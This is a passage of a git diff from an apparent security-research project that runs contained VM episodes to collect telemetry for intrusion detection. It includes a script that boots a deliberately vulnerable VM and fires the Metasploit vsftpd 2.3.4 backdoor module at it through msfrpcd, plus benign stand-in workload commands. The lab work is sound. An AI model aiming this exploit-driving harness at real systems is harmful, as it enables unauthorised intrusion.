default=Path("/var/lib/cis490/index.jsonl"))
|
||||
p.add_argument("--archive-root", type=Path,
|
||||
default=Path("/var/lib/cis490/episodes-archive"))
|
||||
p.add_argument("--reason", action="append", choices=_REASONS,
|
||||
help="Only flag episodes matching this reason. Repeat "
|
||||
"to OR multiple. Default: all reasons.")
|
||||
p.add_argument("--host", help="Only consider episodes from this host_id")
|
||||
action = p.add_mutually_exclusive_group()
|
||||
action.add_argument("--delete", action="store_true",
|
||||
help="Remove flagged tarballs + drop their index rows")
|
||||
action.add_argument("--archive", action="store_true",
|
||||
help="Move flagged tarballs to --archive-root + drop index rows")
|
||||
p.add_argument("--json", action="store_true",
|
||||
help="Machine-readable output instead of summary")
|
||||
args = p.parse_args(argv)
|
||||
|
||||
if not args.episodes_root.exists():
|
||||
print(f"no episodes dir at {args.episodes_root}", file=sys.stderr)
|
||||
return 2
|
||||
|
||||
selected_reasons = set(args.reason or _REASONS)
|
||||
|
||||
quals: list[EpisodeQuality] = []
|
||||
for row, tar in walk_index(args.index, args.episodes_root):
|
||||
if args.host and row["host_id"] != args.host:
|
||||
continue
|
||||
q = classify_episode(tar, row["host_id"], row["episode_id"])
|
||||
# Only mark "fake" if at least one of the selected reasons hits.
|
||||
q.reasons = [r for r in q.reasons if r in selected_reasons]
|
||||
quals.append(q)
|
||||
|
||||
flagged = [q for q in quals if q.fake]
|
||||
kept = [q for q in quals if not q.fake]
|
||||
|
||||
if args.json:
|
||||
print(json.dumps({
|
||||
"scanned": len(quals),
|
||||
"flagged": len(flagged),
|
||||
"kept": len(kept),
|
||||
"by_reason": {
|
||||
r: sum(1 for q in flagged if r in q.reasons) for r in _REASONS
|
||||
},
|
||||
"flagged_episodes": [
|
||||
{
|
||||
"host": q.host_id,
|
||||
"episode": q.episode_id,
|
||||
"size_bytes": q.size_bytes,
|
||||
"reasons": q.reasons,
|
||||
"sample": q.sample_name,
|
||||
"module": q.module_name,
|
||||
} for q in flagged
|
||||
],
|
||||
}, indent=2))
|
||||
else:
|
||||
print(f"scanned: {len(quals)} flagged: {len(flagged)} kept: {len(kept)}")
|
||||
if flagged:
|
||||
print()
|
||||
print(f"{'host':<14} {'episode':<28} {'size':>9} reasons")
|
||||
for q in flagged:
|
||||
print(f"{q.host_id:<14} {q.episode_id:<28} {q.size_bytes:>9} "
|
||||
f"{','.join(q.reasons)}")
|
||||
if not (args.delete or args.archive):
|
||||
print()
|
||||
print("dry-run only. Re-run with --archive (safer) or --delete.")
|
||||
|
||||
if args.delete or args.archive:
|
||||
action = "delete" if args.delete else "archive"
|
||||
apply_action(
|
||||
quals,
|
||||
action=action,
|
||||
archive_root=args.archive_root,
|
||||
index_path=args.index,
|
||||
)
|
||||
print(f"\n{action}d {sum(1 for q in flagged)} episodes")
|
||||
|
||||
return 0 if not flagged else 1
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
sys.exit(main())
|
||||
109
tools/run_fleet.py
Normal file
109
tools/run_fleet.py
Normal file
|
|
@ -0,0 +1,109 @@
|
|||
"""``cis490-fleet`` — run as many concurrent labeled episodes as the
|
||||
host can handle, drawing samples from the manifest.
|
||||
|
||||
Modes:
|
||||
|
||||
--capacity Print the resource calculation and exit. No VMs spawned.
|
||||
--waves N Run N waves of episodes (one wave = max_concurrent
|
||||
episodes, each in its own slot). Default: 1.
|
||||
--max-concurrent N
|
||||
Cap concurrency below the auto-detected ceiling.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import argparse
|
||||
import json
|
||||
import logging
|
||||
import os
|
||||
import signal
|
||||
import sys
|
||||
from pathlib import Path
|
||||
|
||||
# Allow running as a script.
|
||||
sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
|
||||
|
||||
from exploits.modules import load_module_configs # noqa: E402
|
||||
from orchestrator.fleet import ( # noqa: E402
|
||||
FleetConfig, FleetRunner, capacity_report, detect_capacity,
|
||||
)
|
||||
from samples.manifest import SampleManifest # noqa: E402
|
||||
|
||||
|
||||
def main(argv: list[str] | None = None) -> int:
|
||||
p = argparse.ArgumentParser(prog="cis490-fleet")
|
||||
p.add_argument("--capacity", action="store_true")
|
||||
p.add_argument("--waves", type=int, default=1)
|
||||
p.add_argument("--max-concurrent", type=int, default=None)
|
||||
p.add_argument("--manifest",
|
||||
default=str(Path(__file__).resolve().parent.parent / "samples" / "manifest.toml"))
|
||||
p.add_argument("--modules-dir",
|
||||
default=str(Path(__file__).resolve().parent.parent / "exploits" / "modules"))
|
||||
p.add_argument("--data-root", default="data")
|
||||
p.add_argument("--host-id", default=os.environ.get("FLEET_HOST_ID") or os.uname().nodename)
|
||||
p.add_argument("--ram-per-vm-mib", type=int, default=320)
|
||||
p.add_argument("--require-real-samples", action="store_true")
|
||||
p.add_argument("--force-tier2", action="store_true",
|
||||
help="Skip Tier 3 even when msfrpcd is reachable")
|
||||
p.add_argument("--log-level", default="INFO")
|
||||
args = p.parse_args(argv)
|
||||
|
||||
logging.basicConfig(
|
||||
level=getattr(logging, args.log_level.upper(), logging.INFO),
|
||||
format="%(asctime)s %(levelname)s %(name)s %(message)s",
|
||||
)
|
||||
|
||||
if args.capacity:
|
||||
print(capacity_report())
|
||||
return 0
|
||||
|
||||
manifest = SampleManifest.load(args.manifest)
|
||||
repo_root = Path(__file__).resolve().parent.parent
|
||||
modules_dir = Path(args.modules_dir)
|
||||
modules = load_module_configs(modules_dir) if modules_dir.exists() else {}
|
||||
|
||||
cfg = FleetConfig(
|
||||
host_id=args.host_id,
|
||||
repo_root=repo_root,
|
||||
data_root=Path(args.data_root).resolve(),
|
||||
manifest=manifest,
|
||||
modules=modules,
|
||||
ram_per_vm_mib=args.ram_per_vm_mib,
|
||||
max_concurrent_override=args.max_concurrent,
|
||||
require_real_samples=args.require_real_samples,
|
||||
force_tier2=args.force_tier2,
|
||||
)
|
||||
|
||||
runner = FleetRunner(cfg)
|
||||
|
||||
def _stop(signum, frame): # noqa: ARG001
|
||||
runner.stop()
|
||||
signal.signal(signal.SIGTERM, _stop)
|
||||
signal.signal(signal.SIGINT, _stop)
|
||||
|
||||
result = runner.run(episodes=args.waves)
|
||||
|
||||
print(json.dumps({
|
||||
"host_id": args.host_id,
|
||||
"capacity": result.capacity.to_dict(),
|
||||
"modules_loaded": sorted(modules.keys()),
|
||||
"slots": [
|
||||
{
|
||||
"slot": s.slot,
|
||||
"sample": s.sample_name,
|
||||
"sample_kind": s.sample_kind,
|
||||
"tier": s.tier,
|
||||
"module": s.module_name,
|
||||
"rc": s.rc,
|
||||
"duration_s": s.duration_s,
|
||||
"error": s.error,
|
||||
} for s in result.slots
|
||||
],
|
||||
"total_duration_s": result.total_duration_s,
|
||||
}, indent=2))
|
||||
|
||||
return 0 if all(s.rc == 0 for s in result.slots) else 1
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
sys.exit(main())
|
||||
|
|
@ -27,7 +27,9 @@ from pathlib import Path
|
|||
sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
|
||||
sys.path.insert(0, str(Path(__file__).resolve().parent))
|
||||
|
||||
from collectors import qmp # noqa: E402
|
||||
from orchestrator.episode import EpisodeConfig, EpisodeRunner # noqa: E402
|
||||
from samples.manifest import SampleManifest # noqa: E402
|
||||
from vm_load_controller import VMLoadController # noqa: E402
|
||||
from vm_serial import SerialClient # noqa: E402
|
||||
|
||||
|
|
@ -69,7 +71,17 @@ def main() -> int:
|
|||
parser.add_argument("--interval-ms", type=int, default=100)
|
||||
parser.add_argument(
|
||||
"--run-dir",
|
||||
default="/tmp/cis490-vm",
|
||||
# Per-slot defaults so the fleet runner's parallel calls don't
|
||||
# collide on the same /tmp dir (which would have rmtree'd each
|
||||
# other's pidfiles mid-boot — see CIS490 history). Resolution
|
||||
# order:
|
||||
# 1) explicit --run-dir CLI flag
|
||||
# 2) RUN_DIR env (set by the fleet runner)
|
||||
# 3) /tmp/cis490-vm-<SLOT> (SLOT defaults to 0)
|
||||
default=(
|
||||
os.environ.get("RUN_DIR")
|
||||
or f"/tmp/cis490-vm-{os.environ.get('SLOT', '0')}"
|
||||
),
|
||||
help="QEMU run dir (sockets + pidfile go here)",
|
||||
)
|
||||
parser.add_argument(
|
||||
|
|
@ -83,6 +95,16 @@ def main() -> int:
|
|||
default=120.0,
|
||||
help="how long to wait for serial login prompt",
|
||||
)
|
||||
parser.add_argument(
|
||||
"--sample",
|
||||
default=os.environ.get("SAMPLE_NAME"),
|
||||
help="Pick a workload profile from the manifest by name. Fleet runner "
|
||||
"passes this via SAMPLE_NAME env. If unset, runs the v1 yes-loop.",
|
||||
)
|
||||
parser.add_argument(
|
||||
"--manifest",
|
||||
default=str(Path(__file__).resolve().parent.parent / "samples" / "manifest.toml"),
|
||||
)
|
||||
args = parser.parse_args()
|
||||
|
||||
logging.basicConfig(
|
||||
|
|
@ -93,6 +115,17 @@ def main() -> int:
|
|||
|
||||
repo_root = Path(__file__).resolve().parent.parent
|
||||
launcher = repo_root / "vm" / "launch_demo.sh"
|
||||
|
||||
# Resolve sample if requested.
|
||||
sample = None
|
||||
if args.sample:
|
||||
manifest = SampleManifest.load(args.manifest)
|
||||
sample = next((s for s in manifest.samples if s.name == args.sample), None)
|
||||
if sample is None:
|
||||
log.error("sample %r not in manifest %s", args.sample, args.manifest)
|
||||
return 2
|
||||
log.info("using sample=%s profile=%s kind=%s",
|
||||
sample.name, sample.profile, sample.kind)
|
||||
run_dir = Path(args.run_dir)
|
||||
# Wipe any stale sockets/pidfile from a previous run.
|
||||
if run_dir.exists():
|
||||
|
|
@ -137,9 +170,42 @@ def main() -> int:
|
|||
serial.connect()
|
||||
serial.login(boot_timeout_s=args.boot_timeout)
|
||||
|
||||
controller = VMLoadController(serial)
|
||||
# Take a savevm AFTER the guest is fully up but BEFORE we
|
||||
# start any workload. EpisodeConfig.revert_at_{start,end} use
|
||||
# this snapshot for inter-episode reverts (the snapshot lives
|
||||
# in the qcow2's per-VM-process overlay since launch_demo.sh
|
||||
# runs with snapshot=on, so it's discarded with the VM).
|
||||
# Without this step, loadvm would target a snapshot that
|
||||
# doesn't exist and silently emit snapshot_revert_failed.
|
||||
qmp_sock = run_dir / "qmp.sock"
|
||||
if qmp_sock.exists():
|
||||
try:
|
||||
_qmp = qmp.QMPClient(qmp_sock)
|
||||
_qmp.connect()
|
||||
try:
|
||||
out = _qmp.savevm("baseline-v1")
|
||||
log.info("savevm baseline-v1 OK: %s", out.strip()[:160])
|
||||
finally:
|
||||
_qmp.close()
|
||||
except Exception as e:
|
||||
log.warning("savevm failed; revert_at_start unusable: %s", e)
|
||||
|
||||
# Bind the controller to the runner's event log so workload
|
||||
# success/failure shows up alongside phase_transition events.
|
||||
# Sample also goes into EpisodeConfig below so meta.sample
|
||||
# records what was supposed to run.
|
||||
runner_for_emit = {"runner": None}
|
||||
controller = VMLoadController(
|
||||
serial,
|
||||
sample=sample,
|
||||
emit_event=lambda ev, **kw: (
|
||||
runner_for_emit["runner"].emit_event(ev, **kw)
|
||||
if runner_for_emit["runner"] else None
|
||||
),
|
||||
)
|
||||
controller.setup()
|
||||
|
||||
agent_sock = run_dir / "agent.sock"
|
||||
cfg = EpisodeConfig(
|
||||
target_pid=qemu_pid,
|
||||
duration_s=sum(d for _, d in DEFAULT_SCHEDULE),
|
||||
|
|
@ -148,9 +214,18 @@ def main() -> int:
|
|||
phase_schedule=DEFAULT_SCHEDULE,
|
||||
image_name="alpine-3.21-cloudinit",
|
||||
snapshot_name="baseline-v1",
|
||||
qmp_socket=qmp_sock if qmp_sock.exists() else None,
|
||||
guest_agent_socket=agent_sock if agent_sock.exists() else None,
|
||||
bridge_iface=os.environ.get("BRIDGE") or None,
|
||||
sample=sample,
|
||||
)
|
||||
|
||||
result = EpisodeRunner(cfg, on_phase=controller.set_phase).run()
|
||||
runner = EpisodeRunner(cfg, on_phase=controller.set_phase)
|
||||
# Connect the controller's event sink to the runner now that
|
||||
# both exist. (Forward-reference closure pattern keeps the
|
||||
# constructor argument order natural.)
|
||||
runner_for_emit["runner"] = runner
|
||||
result = runner.run()
|
||||
|
||||
controller.teardown()
|
||||
serial.close()
|
||||
|
|
|
|||
300
tools/run_tier3_demo.py
Normal file
300
tools/run_tier3_demo.py
Normal file
|
|
@ -0,0 +1,300 @@
|
|||
"""Tier-3: real VM, real exploit, honest ``armed -> infecting`` transition.
|
||||
|
||||
Boots the vulnerable target VM, drives an msfrpcd-fired exploit module
|
||||
against it, and lets the orchestrator's host /proc collector sample
|
||||
the qemu-system pid throughout. Compared to ``run_real_vm_demo.py``:
|
||||
the workload that crosses the ``armed -> infecting`` boundary is now
|
||||
generated by an actual exploit landing a session, not by a script in
|
||||
the guest.
|
||||
|
||||
Prereqs:
|
||||
- vm/images/<target>.qcow2 (e.g. Metasploitable2)
|
||||
- msfrpcd running locally:
|
||||
msfrpcd -P <password> -U msf -a 127.0.0.1 -p 55553
|
||||
- ``msgpack`` python package installed (added to runtime deps)
|
||||
|
||||
Run:
|
||||
MSFRPC_PASSWORD=<pass> uv run python tools/run_tier3_demo.py \\
|
||||
--module vsftpd_234_backdoor \\
|
||||
--data-root data
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import argparse
|
||||
import logging
|
||||
import os
|
||||
import signal
|
||||
import subprocess
|
||||
import sys
|
||||
import time
|
||||
from pathlib import Path
|
||||
|
||||
# Allow running as a script.
|
||||
sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
|
||||
|
||||
from collectors import qmp # noqa: E402
|
||||
from exploits.driver import DriverConfig, MSFExploitDriver # noqa: E402
|
||||
from exploits.modules import load_module_config # noqa: E402
|
||||
from exploits.msfrpc import MSFRpcClient, MSFRpcConfig # noqa: E402
|
||||
from orchestrator.episode import EpisodeConfig, EpisodeRunner # noqa: E402
|
||||
from samples.manifest import SampleManifest # noqa: E402
|
||||
|
||||
|
||||
# Same envelope shape as Tier 2 so plots are comparable. Slightly more
|
||||
# armed/infecting time because real exploit fire + session establishment
|
||||
# takes hundreds of ms to a few seconds.
|
||||
DEFAULT_SCHEDULE = [
|
||||
("clean", 10.0),
|
||||
("armed", 3.0),
|
||||
("infecting", 5.0),
|
||||
("infected_running", 25.0),
|
||||
("dormant", 15.0),
|
||||
("infected_running", 20.0),
|
||||
("dormant", 5.0),
|
||||
("clean", 5.0),
|
||||
]
|
||||
|
||||
|
||||
def _wait_for_path(path: Path, timeout_s: float) -> None:
|
||||
deadline = time.monotonic() + timeout_s
|
||||
while time.monotonic() < deadline:
|
||||
if path.exists() and path.read_text().strip():
|
||||
return
|
||||
time.sleep(0.2)
|
||||
raise TimeoutError(f"{path} never appeared within {timeout_s}s")
|
||||
|
||||
|
||||
def _wait_for_tcp(host: str, port: int, timeout_s: float) -> None:
|
||||
import socket
|
||||
deadline = time.monotonic() + timeout_s
|
||||
last_err: Exception | None = None
|
||||
while time.monotonic() < deadline:
|
||||
try:
|
||||
with socket.create_connection((host, port), timeout=1.0):
|
||||
return
|
||||
except OSError as e:
|
||||
last_err = e
|
||||
time.sleep(1.0)
|
||||
raise TimeoutError(
|
||||
f"target service {host}:{port} not reachable within {timeout_s}s "
|
||||
f"(last: {last_err})"
|
||||
)
|
||||
|
||||
|
||||
def main() -> int:
|
||||
parser = argparse.ArgumentParser(prog="run_tier3_demo")
|
||||
parser.add_argument("--data-root", default="data")
|
||||
parser.add_argument("--interval-ms", type=int, default=100)
|
||||
parser.add_argument(
|
||||
"--module",
|
||||
default="vsftpd_234_backdoor",
|
||||
help="Module config name in exploits/modules/<name>.toml",
|
||||
)
|
||||
parser.add_argument(
|
||||
"--target-ip",
|
||||
default="127.0.0.1",
|
||||
help="Address the exploit module sets RHOSTS to. With the SLIRP "
|
||||
"launcher (default), the guest's vulnerable port is hostfwd'd to "
|
||||
"loopback; on a host-only bridge, this is the guest's bridge IP.",
|
||||
)
|
||||
parser.add_argument(
|
||||
"--target-port",
|
||||
type=int,
|
||||
default=21,
|
||||
help="Probe port to wait on before firing the exploit",
|
||||
)
|
||||
parser.add_argument(
|
||||
"--run-dir",
|
||||
# Per-slot defaults so the fleet runner's parallel calls don't
|
||||
# collide on the same /tmp dir. See run_real_vm_demo.py for
|
||||
# the same fix.
|
||||
default=(
|
||||
os.environ.get("RUN_DIR")
|
||||
or f"/tmp/cis490-target-{os.environ.get('SLOT', '0')}"
|
||||
),
|
||||
help="QEMU run dir (sockets + pidfile)",
|
||||
)
|
||||
parser.add_argument(
|
||||
"--msfrpc-host", default=os.environ.get("MSFRPC_HOST", "127.0.0.1"),
|
||||
)
|
||||
parser.add_argument(
|
||||
"--msfrpc-port", type=int,
|
||||
default=int(os.environ.get("MSFRPC_PORT", "55553")),
|
||||
)
|
||||
parser.add_argument(
|
||||
"--msfrpc-user", default=os.environ.get("MSFRPC_USER", "msf"),
|
||||
)
|
||||
parser.add_argument(
|
||||
"--keep-vm",
|
||||
action="store_true",
|
||||
help="leave the VM running after the episode finishes",
|
||||
)
|
||||
parser.add_argument(
|
||||
"--target-boot-timeout",
|
||||
type=float,
|
||||
default=180.0,
|
||||
help="how long to wait for the guest's vulnerable service to listen",
|
||||
)
|
||||
parser.add_argument(
|
||||
"--sample",
|
||||
default=os.environ.get("SAMPLE_NAME"),
|
||||
help="Pick a workload profile from the manifest by name. Fleet runner "
|
||||
"passes this via SAMPLE_NAME env. Without it, falls back to the v1 yes-loop.",
|
||||
)
|
||||
parser.add_argument(
|
||||
"--manifest",
|
||||
default=str(Path(__file__).resolve().parent.parent / "samples" / "manifest.toml"),
|
||||
)
|
||||
args = parser.parse_args()
|
||||
|
||||
logging.basicConfig(
|
||||
level=logging.INFO,
|
||||
format="%(asctime)s %(levelname)s %(name)s %(message)s",
|
||||
)
|
||||
log = logging.getLogger("cis490.run_tier3_demo")
|
||||
|
||||
msfrpc_password = os.environ.get("MSFRPC_PASSWORD")
|
||||
if not msfrpc_password:
|
||||
log.error("MSFRPC_PASSWORD env var must be set")
|
||||
return 2
|
||||
|
||||
repo_root = Path(__file__).resolve().parent.parent
|
||||
launcher = repo_root / "vm" / "launch_target.sh"
|
||||
modules_dir = repo_root / "exploits" / "modules"
|
||||
module_path = modules_dir / f"{args.module}.toml"
|
||||
if not module_path.exists():
|
||||
log.error("no module config at %s", module_path)
|
||||
return 2
|
||||
|
||||
module = load_module_config(module_path)
|
||||
log.info("module loaded: %s (%s)", module.name, module.module_path)
|
||||
|
||||
sample = None
|
||||
if args.sample:
|
||||
manifest = SampleManifest.load(args.manifest)
|
||||
sample = next((s for s in manifest.samples if s.name == args.sample), None)
|
||||
if sample is None:
|
||||
log.error("sample %r not in manifest %s", args.sample, args.manifest)
|
||||
return 2
|
||||
log.info("sample=%s profile=%s kind=%s",
|
||||
sample.name, sample.profile, sample.kind)
|
||||
|
||||
run_dir = Path(args.run_dir)
|
||||
if run_dir.exists():
|
||||
import shutil
|
||||
shutil.rmtree(run_dir)
|
||||
run_dir.mkdir(parents=True, exist_ok=True)
|
||||
pid_file = run_dir / "qemu.pid"
|
||||
|
||||
log.info("booting target VM via %s (RUN_DIR=%s)", launcher, run_dir)
|
||||
env = os.environ.copy()
|
||||
env["RUN_DIR"] = str(run_dir)
|
||||
qemu = subprocess.Popen(
|
||||
[str(launcher)],
|
||||
cwd=str(repo_root),
|
||||
env=env,
|
||||
stdout=subprocess.DEVNULL,
|
||||
stderr=subprocess.DEVNULL,
|
||||
start_new_session=True,
|
||||
)
|
||||
|
||||
try:
|
||||
_wait_for_path(pid_file, timeout_s=15.0)
|
||||
qemu_pid = int(pid_file.read_text().strip())
|
||||
log.info("qemu pid = %d; waiting for service on %s:%d (timeout %.0fs)",
|
||||
qemu_pid, args.target_ip, args.target_port,
|
||||
args.target_boot_timeout)
|
||||
_wait_for_tcp(args.target_ip, args.target_port, args.target_boot_timeout)
|
||||
log.info("target service is up")
|
||||
|
||||
# Pre-exploit savevm so EpisodeConfig.revert_at_{start,end}
|
||||
# has a known-good baseline to load. Best-effort — we still
|
||||
# run the episode if savevm fails (just without revert
|
||||
# support). See run_real_vm_demo.py for the same pattern.
|
||||
qmp_sock = run_dir / "qmp.sock"
|
||||
if qmp_sock.exists():
|
||||
try:
|
||||
_qmp = qmp.QMPClient(qmp_sock)
|
||||
_qmp.connect()
|
||||
try:
|
||||
out = _qmp.savevm("baseline-v1")
|
||||
log.info("savevm baseline-v1 OK: %s", out.strip()[:160])
|
||||
finally:
|
||||
_qmp.close()
|
||||
except Exception as e:
|
||||
log.warning("savevm failed; revert_at_start unusable: %s", e)
|
||||
|
||||
client = MSFRpcClient(
|
||||
MSFRpcConfig(
|
||||
host=args.msfrpc_host,
|
||||
port=args.msfrpc_port,
|
||||
user=args.msfrpc_user,
|
||||
password=msfrpc_password,
|
||||
)
|
||||
)
|
||||
|
||||
cfg = EpisodeConfig(
|
||||
target_pid=qemu_pid,
|
||||
duration_s=sum(d for _, d in DEFAULT_SCHEDULE),
|
||||
interval_ms=args.interval_ms,
|
||||
data_root=Path(args.data_root),
|
||||
phase_schedule=DEFAULT_SCHEDULE,
|
||||
image_name=module.name + "-target",
|
||||
snapshot_name="baseline-v1",
|
||||
sample=sample,
|
||||
exploit_meta={
|
||||
"framework": "metasploit",
|
||||
"module": module.module_path,
|
||||
"module_type": module.module_type,
|
||||
"module_name": module.name,
|
||||
"payload": module.payload_path,
|
||||
"rport": module.options.get("RPORT"),
|
||||
"rhost_template": module.options.get("RHOSTS"),
|
||||
},
|
||||
)
|
||||
runner = EpisodeRunner(cfg)
|
||||
|
||||
driver = MSFExploitDriver(
|
||||
client=client,
|
||||
module=module,
|
||||
cfg=DriverConfig(
|
||||
target_ip=args.target_ip,
|
||||
sample_store_root=repo_root / "samples" / "store",
|
||||
),
|
||||
emit_event=runner.emit_event,
|
||||
sample=sample,
|
||||
)
|
||||
runner.on_phase = driver.set_phase
|
||||
|
||||
driver.setup()
|
||||
try:
|
||||
result = runner.run()
|
||||
finally:
|
||||
driver.teardown()
|
||||
|
||||
print()
|
||||
print(f"episode_id = {result.episode_id}")
|
||||
print(f"path = {result.episode_dir}")
|
||||
print(f"rows_proc = {result.rows_proc}")
|
||||
print(f"phases = {result.phases_observed}")
|
||||
print(f"module = {module.module_path}")
|
||||
print()
|
||||
print("To plot:")
|
||||
print(f" uv run python tools/plot_envelope.py {result.episode_dir}")
|
||||
return 0
|
||||
finally:
|
||||
if not args.keep_vm:
|
||||
log.info("shutting down VM (pid=%d)", qemu.pid)
|
||||
try:
|
||||
os.killpg(os.getpgid(qemu.pid), signal.SIGTERM)
|
||||
except ProcessLookupError:
|
||||
pass
|
||||
try:
|
||||
qemu.wait(timeout=5)
|
||||
except subprocess.TimeoutExpired:
|
||||
os.killpg(os.getpgid(qemu.pid), signal.SIGKILL)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
sys.exit(main())
|
||||
|
|
@ -22,21 +22,63 @@ fire and a real sample.
|
|||
from __future__ import annotations
|
||||
|
||||
import logging
|
||||
import sys
|
||||
from pathlib import Path
|
||||
from typing import Callable
|
||||
|
||||
from vm_serial import SerialClient
|
||||
|
||||
# Allow running as a script (sibling of tools/).
|
||||
sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
|
||||
|
||||
from exploits.workloads import Workload, workload_for # noqa: E402
|
||||
from samples.manifest import Sample # noqa: E402
|
||||
|
||||
|
||||
log = logging.getLogger("cis490.vm_load_controller")
|
||||
|
||||
|
||||
EmitEvent = Callable[..., None]
|
||||
|
||||
|
||||
class VMLoadController:
|
||||
def __init__(self, serial: SerialClient) -> None:
|
||||
"""Drives a real Alpine guest through the phase schedule for
|
||||
Tier 2 (no exploit). Workload is chosen by ``sample.profile`` —
|
||||
same profile catalog as the Tier-3 driver so a fleet wave
|
||||
produces matched envelopes whether or not an exploit fires.
|
||||
|
||||
Without a sample, falls back to the original cpu-saturate yes-loop
|
||||
(the original Tier-2 demo behaviour).
|
||||
|
||||
Every set_phase call emits an event into the runner's events.jsonl
|
||||
so we can audit (a) whether the workload command actually got
|
||||
sent, (b) whether the guest acknowledged it, and (c) whether the
|
||||
expected process is running afterwards. Without those events,
|
||||
silent failures (login partial, command swallowed by tty) produce
|
||||
well-labeled but information-less episodes — see CIS490 history
|
||||
where every phase median'd 20% CPU on elliott-lab."""
|
||||
|
||||
def __init__(
|
||||
self,
|
||||
serial: SerialClient,
|
||||
sample: Sample | None = None,
|
||||
emit_event: EmitEvent | None = None,
|
||||
) -> None:
|
||||
self.s = serial
|
||||
self.sample = sample
|
||||
self.workload: Workload | None = workload_for(sample)
|
||||
# No-op default so callers don't have to thread an emitter.
|
||||
self.emit: EmitEvent = emit_event or (lambda *a, **kw: None)
|
||||
|
||||
def setup(self) -> None:
|
||||
# Kill any pre-existing load and clear scratch space.
|
||||
self._kill_load()
|
||||
self.s.run("rm -f /tmp/payload /tmp/armed.log; echo setup-ok")
|
||||
self.emit(
|
||||
"workload_setup",
|
||||
profile=self.workload.profile if self.workload else "v1-yes",
|
||||
sample=self.sample.name if self.sample else None,
|
||||
)
|
||||
|
||||
def teardown(self) -> None:
|
||||
self._kill_load()
|
||||
|
|
@ -44,29 +86,86 @@ class VMLoadController:
|
|||
# ---- phases ---------------------------------------------------------
|
||||
|
||||
def set_phase(self, phase: str) -> None:
|
||||
log.info("vm phase -> %s", phase)
|
||||
if phase == "clean":
|
||||
self._kill_load()
|
||||
elif phase == "armed":
|
||||
self.s.run("echo armed-handshake-$(date +%s) > /tmp/armed.log")
|
||||
elif phase == "infecting":
|
||||
self.s.run(
|
||||
"dd if=/dev/urandom of=/tmp/payload bs=4k count=128 2>/dev/null && "
|
||||
"chmod +x /tmp/payload"
|
||||
log.info("vm phase -> %s (profile=%s)",
|
||||
phase, self.workload.profile if self.workload else "v1")
|
||||
try:
|
||||
if phase == "clean":
|
||||
self._kill_load()
|
||||
self._emit_phase("workload_killed", phase)
|
||||
elif phase == "armed":
|
||||
self.s.run("echo armed-handshake-$(date +%s) > /tmp/armed.log")
|
||||
self._emit_phase("workload_armed", phase)
|
||||
elif phase == "infecting":
|
||||
self.s.run(
|
||||
"dd if=/dev/urandom of=/tmp/payload bs=4k count=128 2>/dev/null && "
|
||||
"chmod +x /tmp/payload"
|
||||
)
|
||||
self._emit_phase("workload_infecting", phase)
|
||||
elif phase == "infected_running":
|
||||
self._kill_load()
|
||||
if self.workload is not None:
|
||||
self.s.run(self.workload.start_cmd)
|
||||
else:
|
||||
self.s.run(
|
||||
"nohup sh -c 'yes > /dev/null' </dev/null >/dev/null 2>&1 & disown"
|
||||
)
|
||||
self._emit_phase("workload_started", phase)
|
||||
elif phase == "dormant":
|
||||
# Probe BEFORE we kill so we see whether the workload
|
||||
# was actually running. If the probe says nothing was
|
||||
# running, the previous infected_running was a no-op
|
||||
# and the trainer should filter this episode.
|
||||
probe = self._probe()
|
||||
self._kill_load()
|
||||
self._emit_phase("workload_killed", phase, pre_kill_probe=probe)
|
||||
else:
|
||||
log.warning("unknown phase: %s", phase)
|
||||
except Exception as e:
|
||||
# Don't propagate — the runner already swallows on_phase
|
||||
# exceptions. But DO record so the episode is filterable.
|
||||
log.exception("set_phase(%s) failed", phase)
|
||||
self.emit(
|
||||
"workload_failed",
|
||||
phase=phase,
|
||||
error=str(e)[:200],
|
||||
profile=self.workload.profile if self.workload else "v1-yes",
|
||||
)
|
||||
elif phase == "infected_running":
|
||||
self._kill_load()
|
||||
# Background CPU burner. `nohup` + `&` + redirects to detach.
|
||||
self.s.run(
|
||||
"nohup sh -c 'yes > /dev/null' </dev/null >/dev/null 2>&1 & disown"
|
||||
)
|
||||
elif phase == "dormant":
|
||||
self._kill_load()
|
||||
else:
|
||||
log.warning("unknown phase: %s", phase)
|
||||
|
||||
# ---- internals ------------------------------------------------------
|
||||
|
||||
def _kill_load(self) -> None:
|
||||
# `true` at the end so the run() exit status is always 0.
|
||||
if self.workload is not None:
|
||||
self.s.run(self.workload.stop_cmd)
|
||||
# Always sweep the v1 leftover commands too, in case we just
|
||||
# switched profiles mid-fleet-run.
|
||||
self.s.run("pkill yes 2>/dev/null; pkill stress-ng 2>/dev/null; true")
|
||||
|
||||
def _probe(self) -> dict:
|
||||
"""Ask the guest what's actually running. Returns a small dict
|
||||
the caller stamps into the event so trainers can detect the
|
||||
"workload didn't fire" case from meta alone."""
|
||||
try:
|
||||
out = self.s.run(
|
||||
"echo yes=$(pgrep -c yes 2>/dev/null || echo 0); "
|
||||
"echo sh=$(pgrep -c sh 2>/dev/null || echo 0); "
|
||||
"echo loadavg=$(awk '{print $1}' /proc/loadavg)"
|
||||
)
|
||||
stats: dict = {}
|
||||
for line in out.splitlines():
|
||||
line = line.strip()
|
||||
if "=" not in line:
|
||||
continue
|
||||
k, _, v = line.partition("=")
|
||||
stats[k.strip()] = v.strip()
|
||||
return stats
|
||||
except Exception as e:
|
||||
return {"probe_error": str(e)[:120]}
|
||||
|
||||
def _emit_phase(self, event: str, phase: str, **extra) -> None:
|
||||
self.emit(
|
||||
event,
|
||||
phase=phase,
|
||||
profile=self.workload.profile if self.workload else "v1-yes",
|
||||
sample=self.sample.name if self.sample else None,
|
||||
**extra,
|
||||
)
|
||||
|
|
|
|||
274
vm/guest-agent/cis490_agent.py
Normal file
274
vm/guest-agent/cis490_agent.py
Normal file
|
|
@ -0,0 +1,274 @@
|
|||
#!/usr/bin/env python3
|
||||
"""In-guest telemetry agent — runs INSIDE the VM.
|
||||
|
||||
Writes one JSON-lines row per tick to a virtio-serial port that the
|
||||
host has wired up as ``cis490.guest.agent``. The host-side collector
|
||||
(`collectors.guest_agent`) reads these rows and stamps them with the
|
||||
host's monotonic clock before persisting to ``telemetry-guest.jsonl``.
|
||||
|
||||
